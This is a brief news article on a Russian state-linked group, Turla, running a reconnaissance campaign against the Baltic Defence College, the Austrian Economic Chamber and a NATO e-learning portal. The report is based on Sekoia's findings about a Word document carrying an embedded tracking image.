RUSSIAN HACKER GROUP ‘TURLA’ BEHIND THE ATTACKS.
According to a cybersecurity company, Sekoia, Russian state-sponsored hacking group, Turla, is running a new reconnaissance campaign against Austrian Economic Chamber, a NATO platform and the Baltic Defense College.
This revelation is based on prior findings by Google’s Threat Analysis Group (TAG) which is keeping a close eye on Russian hackers—either independent or state-sponsored. During a routine surveillance mission, Sekoia security specialists observed that Turla operatives were targeting an Austrian federal organization and a military institution in the Baltic region.
Google had already warned of renewed activity in the region by Russia-based threat actors. They had noticed that two of Turla domains were being employed in ongoing efforts.
Turla has remained in the news since at least 2014 and the group is known to have close ties with Russian Federation’s FSB service. Turla’s exploits are closely monitored and well-documented. The group was recently detected while deploying backdoors and Remote Access Trojans (RATs) against various EU governments, embassies and research institutes. The IP address, believed to be one used by the group, links it to targeted systems.
One of the targets is a military college in Estonia, jointly operated by Estonia, Latvia and Lithuania which acts as a center for strategic and operational research in the Baltic region. The next target is Austrian Federal Economic Chamber, known as WKO, that advises governments on legislation and economic sanctions around the world. Finally, the last one is an e-learning portal of the NATO Joint Advanced Distributed Learning Platform.
The detective work performed by Sekoia is worth mentioning. It was observed that the domains were hosting a malicious Word document with the name ‘War Bulletin19.00 CET 27.04.docx.’ The document was infiltrated in various directories of the website. The word file contained an embedded PNG which is the key of reconnaissance operations. The word file itself had no malicious macros. With that discovery, Sekoia deduced that Turla was aiming its operations against Austrian federal organization and a military institution of the Baltic region.
For the aid of cyber defenders, Sekoia has provided a Yara rule which can be very helpful in combatting and neutralizing the attacks.
Turla also focuses on getting hold of their victim’s IP addresses, which becomes a helpful tool in subsequent phases of operations.